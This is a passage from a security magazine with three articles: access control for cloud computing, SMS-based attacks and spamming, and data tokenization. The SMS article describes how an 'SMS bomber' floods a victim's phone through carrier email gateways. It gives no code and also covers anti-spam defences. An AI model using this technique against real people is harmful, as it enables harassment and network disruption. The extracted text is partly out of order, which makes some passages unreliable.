Cloud computing: Could computing has been getting a lot of attention lately, but the reality is that many of the same rules that apply for MSSPʼs also apply in cloud scenarios. In cloud environments you might have a variety of administrators accessing cloud infrastructure to manage and configure the infrastructure and cloud customers that require access to their data – in both cases there can be huge consequences if either sets of users accessed anything but authorized systems and data. Third party access control systems provide many of the controls that remove many of the security and compliance issues that are currently inhibiting mass adoption of Cloud Computing. " Cross-agency development/information sharing: In the federal arena, inter- and intraagency information sharing - especially when it comes to application development – is an area of significant innovation. However, creating an environment where individuals have varying security clearances and strict information assurance requirements can be a challenge - especially if they need to move around the network, which is a common requirement in joint development scenarios. Managing supply chains: A sophisticated supply chain requires multiple parties to have access to multiple applications or systems. In some cases, a simple portal model will suffice. In other cases, if competitors are bidding for a specific job, or in the transfer of sensitive goods, supply chain tracking can only work if strong controls are in place that dictate who has access to what systems. Knowing that there are no silver bullets or one-size-fits-all solutions for security, here are some of the fundamental requirements for implementing the access controls required to enable the above scenarios: 1) Policy-driven: At the start of any technology deployment, common sense dictates an audit of current access polices to see if they are aligned with the needs of the business. If they arenʼt, they need to be adjusted in a way that is flexible enough to account for future
change. This should be part and parcel of any access control solution. If the policy engine is not native to the specific solution, it should be able to integrate and communicate with other systems where access policies may already reside. 2) Enforceable: Policies are useless without the ability to enforce them. While this might sound like a no brainier, the reality is that the more secure a system is, the more complex it is to manage and use. While you donʼt want trusted outsiders to have free reign on the network, you do want them to have easy access to the systems they need to access in order to do their jobs. Access rights and privileges are dictated via policies, and enforced via controls. 3) Auditable: Access control solutions must provide robust reporting and auditing capabilities where information can be easily disseminated to a diverse set of stakeholders with varying agendas. For example, a business lead might want a report that shows that no one went anywhere on the network they were not supposed to and that there are no compliance violations. An IT administrator might want much more granular audit trail that can be used for compliance, forensics, e-discovery, SLAs, etc. 4) “Future-proof”: Interoperability with legacy and future systems should be a given with any emerging technology. This is a fine line to walk. For example, many private and public sector agencies are embracing virtualization/ Cloud computing as a way to maximize resources while minimizing costs. That having been said, some of the worldʼs most powerful networks are still powered by mainframe systems that will need to talk to those virtualized environments. Making sure access control systems are both backward and forward compatible will lower the TCO and raise the ROI of ANY technology investment. While this is just a baseline, itʼs a good start - any solution without these attributes will not provide the security and compliance controls needed for secure collaboration.
Dave Olander is the SVP Engineering at Xceedium (www.xceedium.com), where he oversees the evolution of the Xceedium GateKeeper. www.insecuremag.com
!
!
69
According to recent news, users use their mobile phones for many tasks, but relatively few phone calls. Instead of calling, people prefer to send text messages and use their mobile phone for browsing, listening to music and emailing. Three-quarters of the teen population and 90 percent of households in the United States have a mobile phone. However, according to industry data, the amount of voice minutes has stagnated, while the number of text messages has increased considerably. Itʼs no wonder, then, that the cracker community sees the SMS mode of communication as an opportunity to exploit and a way of reaping maximum benefits. In the last two years, there has been a substantial rise in attacks conducted via text messages. The bad guys are working hard to find a way to exploit mobile devices by taking advantage of a vulnerability or a loophole in texting.
log. This worm also stole the victimʼs device information and uploaded it to a server.
But, let us revisit some of the popular exploits used recently.
In the summer of 2009, researchers did a live demonstration of an exploit at BlackHat conference, which allowed them to take complete control of victimʼs iPhone by sending a unique SMS message. Later, in the fall of 2009, RIM issued an advisory about a certificate-handling flaw that could allow an attacker to trick users into visiting a malicious websites via SMS messages.
In the spring of 2009, smartphone users were taken aback by the sophistication of an SMS worm attack known as YXES, which targeted Symbian devices. The worm delivered a text message with a link to a website that, if followed, would allow a malicious payload to be downloaded onto the victimʼs device. Once it was infected, the malicious payload attempted to send SMSʼ to contacts in the victimʼs phone
A denial of service attack - dubbed “Curse of Silence” - that limits the number of SMSʼ that can be received by a mobile device, was disclosed and demonstrated at 25th Chaos Communication Congress (25C3) in 2008, and it also involved sending a specially crafted SMS message to the victimʼs mobile device. According to the security researchers at Pennsylvania State University, attackers
www.insecuremag.com
71
could cause denial of service by spamming the mobile network and, if successful, they could cripple it.
anonymity. To clarify this point, this article will discuss Windows and Unix-like platform based SMS spamming techniques.
Last, but not least, is the ubiquitous threat to which every smartphone device platform is vulnerable: SMS spamming.
SMS spamming via Windows
Neither smartphones nor service providers offer a feature that could regulate the flow of incoming text messages and verify its contents on the userʼs device. Thus, smartphone users are vulnerable to attacks via SMS and spam text messages sent by companies that want to promote their products. These unsolicited text messages are not only irritating, but they can also pose a security risk to the users. Considering the increase in SMS-based attacks on the smartphone, it has become essential to have certain policies in place to verify and regulate incoming text messages. This article aims to educate users about the fact that SMS spamming can be easily executed, while simultaneously maintaining complete
SMS spamming via Linux The previous section discusses an application that can send a large number of spam text messages to the victim. However, there is also an easier way of doing this: a spammer can use a script.
On Windows, the spammer can use an application like “SMS bomber” that can be easily coded using VB (Visual Basic) or Java. This application has a simple front-end that requires the following information: victimʼs phone number, service provider, message and number of times the SMS will be sent (as shown below). Once the spammer clicks on the “BOMB” button, the application composes an email message similar to the message shown in below, and emails it to the SMS gateway of the victimʼs service provider. The email address of the SMS gateways of the various service providers is publicly available on numerous sites and public forums,s and the developer can use this information in its application.
this number can be changed to hundreds or thousands and even higher - to an extent that it can even clog the network resources. I tested the script on a T-Mobile and Verizon number and the results are shown on the following page - Windows HTC and BlackBerry devices.
The script that I tested sends two hundred and fifty text messages to the victim. Nevertheless, www.insecuremag.com
72
Anti-spam on the smartphone Anti-spam technology for SMS spam differs from anti-spam technology for email spam. Due to the limitation in the control of third party vendors over the features supported by mobile platforms, the endpoint anti-spam security is the most feasible solution. The following options should be useful: • Enable SMS/Call blocking - Blocks SMS/ calls from specific numbers. • Enable Shortcode Blocking - Blocks SMS from numbers that have five or fewer digits.
• Prompt to Block Ignored Callers - Generates a prompt message before ignoring the SMS/ call from a blocked number. SMS messages sent over the Internet using software applications like SMS Bomber do not have an originating number. Thus, when the service vendor delivers that SMS to the victim, the SMS appears to be originating from a four-digit number. If there's anti-spam on the userʼs device, and the “Enable Shortcode Blocking” setting is on, the technology blocks the SMSʼ coming from a number less that contains less than five digits and logs the result into the spam log.
Mayank Aggarwal is a security researcher at Global Threat Center, SMobile Systems. His research focuses on exploiting security loopholes in smartphones, malware analysis and reverse engineering. He is a certified ethical hacker (CEH) and a Sun certified Java programmer (SCJP). (
[email protected], twitter: unsecuremobile).
www.insecuremag.com
73
This is a new approach to data tokenization – one that eliminates challenges associated with standard centralized tokenization. The usual way of generating tokens is prone to issues that impact the availability and performance of the data, particularly when it comes to high volume operations. From a security standpoint, it is critical to address the issue of collisions caused when tokenization solutions assign the same token to two separate pieces of data. This next generation tokenization solution addresses all of these issues. System performance, availability and scaling are enhanced; numeric and alpha tokens are generated to protect a wide range of high-risk data; key management is greatly simplified; and collisions are eliminated. This new approach has the potential to change where tokenization can be used. Different ways to render data unreadable There are three different ways to render data unreadable: 1) Two-way cryptography with associated key management processes
www.insecuremag.com
2) One-way transformations including truncation and one-way cryptographic hash functions 3) Index tokens and pads. Two-way encryption of sensitive data is one of the most effective means of preventing information disclosure and, consequently, fraud. Cryptographic technology is mature and wellproven. The choice of encryption scheme and topology is critical in deploying a secure, effective and reasonable control. Hash algorithms are one-way functions that turn a message into a fingerprint and are usually no more than a dozen bytes long. Truncation will discard part of the input field. These approaches are used to reduce the cost of securing data fields when data is not needed to do business and when there will never be a need to get the original data back again. Tokenization consists of substituting sensitive data with replacement values that retain all the essential characteristics without compromising the security of the data.
75
A token can be thought of as a claim check that an authorized user or system can use to obtain sensitive data such as a credit card number. When implementing tokenization, all credit card numbers usually stored in business applications and databases are removed and placed in a highly secure, centralized encryption management server that can be protected and monitored by using robust encryption technology. A central token solution • Minimize the risk of exposing data with intrinsic value • Reduce the number of potential attack targets • Reduce the cost of PCI assessment. All industries can benefit from centralization and tokenization of data. Tokenization is about understanding how to design systems and processes to minimize the risk of exposing data elements with intrinsic (or market) value.
An enterprise tokenization strategy reduces the overall risk to the enterprise by limiting the amount of people having access to confidential data. When tokenization is applied strategically to enterprise applications, confidential data management costs are reduced and the risk of a security breach is eliminated. Security is immediately strengthened by reducing the number of potential targets for would-be attackers. Studies have shown annual audits average $225K per year for the worldʼs largest credit card acceptors. Any business that collects, processes or stores payment card data is likely to gain measurable benefits from central tokenization. Most of the tokenization packages available today are focused on the Point of Sale (POS), card data is removed from the process at the earliest point and a token number with no value to the attacker is provided. These approaches are offered by third party gateway vendors and other service providers.
MYTH: DATA IS GONE FOREVER IF YOU LOSE ACCESS TO THE ENCRYPTION KEYS. Common myths about tokenization Myth: Data is gone forever if you lose access to the encryption keys Myth: Do not encrypt data that will be tokenized Myth: Tokens transparently solve everything. There is a lot of erroneous information about tokenization out there. For example, that tokenization is better than encryption because “if you lose access to the encryption keys the data is gone forever.” This issue exists with both tokenization and encryption, and in both cases can be managed through proper key management, and secure key recovery process. Both a key server and a token server can crash, and therefore must have a backup. The token server is often using encryption to encrypt the data that is stored there, so the token server may also lose the key. A solid key management solution and process is a critical part of any enterprise data protection plan. Some articles encourage businesses not to encrypt data that they plan to tokenize. They www.insecuremag.com
claim that encrypted data takes more tokenization space than clear text data, and that many forms of sensitive data contain more characters than a 16-digit credit card number causing storage and manageability problems. This is untrue if you are using FormatControlling Encryption (FCE). Telling companies not to encrypt because of an issue that is easily addressed denies them a critical layer of security that adds to the defense of sensitive data. Tokenization can often be a complicated affair in larger retail environments or enterprises because the data resides in many places, different applications, and service providers. Applications which have to process the real value of the data would need to be reworked to support tokenization. The cost of changing the application code can be hard to justify when considering the level of risk reduction. Regardless of industry, if the data resides in many different places, switching to tokenization will probably require some programming changes and you may not be able to rebuild if using a legacy application. 76
Tokenizing and the data lifecycle The combined approaches of tokenization and encryption can be used to protect the whole data lifecycle in an enterprise. It also provides high quality production level data in test environments, virtualized servers and outsourced environments. In the development lifecycle there is a need to be able to perform high quality test scenarios on production quality test data by reversing the data hiding process. Key data fields that can be used to identify an individual or corporation need to be cleansed to depersonalize the information. In the early stages of implementation, cleansed data needs to be easily restored (for downstream systems and feeding systems). This requires two-way processing. The restoration process should be limited to situations for which there is no alternative to using production data. Authorization to use this process must be limited and controlled. In some situations, business rules must be maintained during any cleansing operation (addresses for processing, dates of birth for age processing, names for gender distinction). There should also be the ability to set parameters, or to select or identify fields to be scrambled, based on a combination of business rules. Should a company build their own tokenizing solution?
could present logistical, tactical, and budgetary challenges. For many organizations, locating the in-house expertise to develop such complex capabilities as key management, token management, policy controls, and heterogeneous application integration can be very difficult. Writing code that interfaces with multiple applications, while minimizing the performance impact on those applications, presents an array of challenges. The overhead of maintaining and enhancing a security product of this complexity can ultimately represent a huge resource investment and a distraction from an organizationʼs core focus and expertise. Security administrators looking to gain the benefits of centralization and tokenization without having to develop and support their own tokenization server, should look at vendors that offer off-the-shelf solutions. Reasons to keep the token server in-house • Liability and risk • Many applications use or store data • Multi-channel commerce • Security of outsourcing • Recurring cost of tokenization when data volume is increasing, since outsourcing may charge based on transaction volume • Issues of transparency, availability, performance and scalability.
Developing all the capabilities to build an inhouse solution can present significant challenges. In order to implement tokenization effectively, all applications that currently house payment data must be integrated with the centralized tokenization server. Developing either of these interfaces would require a great deal of expertise to ensure performance and availability. Writing an application that is capable of issuing and managing tokens in heterogeneous environments that can support multiple field length requirements can be complex and challenging.
Typically, companies do not want to outsource secure handling of data since they cannot outsource risk and liability. Organizations are not willing to move the risk from its environment into a potentially less secure hosted environment. Furthermore, enterprises need to maintain certain information about transactions at the point of sales (POS), as well as on higher levels. In most retail systems, there are multiple applications that use or store card data, from the POS to the data warehouses, as well as sales audit, loss prevention, and finance. At the same time, the system needs to be adequately protected from data thieves.
Furthermore, ongoing support of this application could be time consuming and difficult. Allocating a dedicated resource to this large undertaking and covering for responsibilities
Merchants who gather card data via Web commerce, call centers and other channels, should ensure that the product or service they use can tokenize data through all channels.
www.insecuremag.com
77
Not all offerings in the market work well or cost-effectively in a multi-channel environment, particularly if the token service is outsourced. Merchants need to ensure that their requirements reflect current and near-future channel needs. Another concern is that tokenization is new and unproven and can pose an additional risk relative to mature encryption solutions. A risk management analysis will reveal whether the cost of deploying in-house tokenization is worth the benefits. An outsourcing environment must be carefully reviewed from a security point and provide a reliable service to each globally connected endpoint. Many merchants continue to object
to having anyone keep their card data other than themselves. Often, these are leading merchants that have made significant investments in data security and simply do not believe that any other company has more motivation (or better technology) than they do to protect their data. Along with separation of duties and auditing, a tokenization solution requires a solid encryption and key management system to protect the information in the centralized token server. By combining encryption with tokenization, organizations can have security, efficiency, and cost savings for application areas within an enterprise.
HOLISTIC SOLUTIONS CAN SUPPORT END-TO-END FIELD ENCRYPTION, WHICH IS AN IMPORTANT PART OF THE PROTECTION OF THE SENSITIVE DATA FLOW. Holistic solutions can support end-to-end field encryption, which is an important part of the next generation protection of the sensitive data flow. In some data flows, the best combination is end-to-end field encryption utilizing format controlling encryption from the point of acquisition and into the central systems. At that point, the data field will be converted to a token for permanent use within the central systems. A mature solution should provide this integration between encryption/ tokenization processes. Security is addressed by running the tokenization solution in-house on a high security network segment isolated from all other data and applications. If a segmented approach is used, most tokenization requests will need to be authorized to access this highly sensitive server. Access to the token server must be provided based on authentication, authorization, encrypted channel and monitoring and/or blocking of suspicious transaction volumes and requests. Transparency, availability, performance, scalability and security are common concerns with tokenization, particularly if the service is outsourced. Transparency can be enhanced by selecting a tokenization solution that is well integrated into enterprise systems like databases. Availability concerns can be addressed by selecting a tokenization solution that is www.insecuremag.com
running in-house on a high availability platform. Performance issues can be addressed by selecting a tokenization solution that is running locally on your high transaction volume servers. Scalability is best addressed by a selecting a tokenization solution that is running in-house on your high performance corporate back-bone network. The solution: Distributed tokenization Distributed tokenization is a method of storing sensitive strings of characters on a local server. This new approach changes where tokenization can be used. After years of research and development, Protegrity has developed a solution by intelligently altering the traditional backend processes used in tokenization. This new patent-pending way to tokenize data eliminates the challenges associated with standard centralized tokenization and solves the issues described above with outsourcing. Particularly in high volume operations, the usual way of generating tokens is prone to issues that impact the availability and performance of the data. From a security standpoint, it is critical to address the issue of collisions caused when tokenization solutions assign the same token to two separate pieces of data.
78
This next generation tokenization solution addresses all issues. System performance, availability and scaling are enhanced, numeric and alpha tokens are generated, key management is greatly simplified, and collisions are eliminated. The benefits include scalability with multiple, parallel instances, dramatic high performance, highly available, centralized or distributed deployment, no token collisions and support of PCI and PII data. A solution can provide easy export of the static token tables to remote Token Servers to support a distributed tokenization operation. The static token tables can easily be distributed by using a simple file export to each Token Server. Each token table should be encrypted throughout this export and import operation. Conclusion This new way to tokenize data eliminates challenges associated with standard centralized tokenization, and has the potential to change where tokenization can be used. It is important to understand that data is stored to render follow-up checks, audits, and analysis. At the same time the information stored on the servers is a security risk, and
needs to be protected. Even though the examples discussed in this article are mostly concerned with credit card numbers, similar issues are encountered when handling social security numbers, driving license numbers or bank account numbers. Companies need to deploy an enterprise tokenization and key management solution to lock down various data across the enterprise. A holistic solution for data security should be based on a centralized data security management that protect sensitive information from acquisition to deletion across the enterprise. Third party data security vendors develop solutions that protect data in the most cost effective manner. External security technology specialists with deep expertise in data security techniques, encryption key management, and security policy in distributed environments are needed to find the most cost effective approach for each organization. To maximize security with minimal business impact, high performance, transparent solution optimized for the dynamic enterprise will require a riskadjusted approach to data security. This approach will optimize the data security techniques that will be deployed on each system in the enterprise.
Ulf T. Mattsson is the CTO of Protegrity. Ulf created the initial architecture of Protegrityʼs database security technology, for which the company owns several key patents. His extensive IT and security industry experience includes 20 years with IBM as a manager of software development and a consulting resource to IBM's Research and Development organization, in the areas of IT Architecture and IT Security. Ulf holds a degree in electrical engineering from Polhem University, a degree in Finance from University of Stockholm and a master's degree in physics from Chalmers University of Technology.
www.insecuremag.com
79